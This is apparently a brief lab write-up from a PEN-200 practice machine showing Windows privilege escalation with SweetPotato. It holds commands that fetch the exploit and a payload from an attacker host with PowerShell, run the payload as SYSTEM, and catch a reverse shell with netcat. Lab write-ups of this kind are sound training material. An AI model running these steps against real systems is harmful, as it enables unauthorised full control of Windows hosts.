SweetPotato
The compromised, nathan, account is a service account with SeImpersonatePrivilege enabled.
This makes the target system vulnerable to the potato exploits
PS C:\tmp> iwr -uri http://192.168.45.245/SweetPotato.exe -Outfile C:\tmp\SweetPotato.exe
PS C:\tmp> iwr -uri http://192.168.45.245/pe.exe -Outfile C:\tmp\pe.exeDelivering the exploit and payload
PS C:\tmp> cmd /c C:\tmp\SweetPotato.exe -p C:\tmp\pe.exe -e EfsRpc
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method EfsRpc to launch C:\tmp\pe.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/a06b4c7f-2590-4464-9fb7-8b0c6fa979b6/\a06b4c7f-2590-4464-9fb7-8b0c6fa979b6\a06b4c7f-2590-4464-9fb7-8b0c6fa979b6
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!Executing with the EfsRpc method
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/billyboss]
└─$ nnc 443
listening on [any] 443 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.148.61] 63063
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
nt authority\system
C:\Windows\system32> hostname
hostname
billyboss
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.148.61
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.148.254System level compromise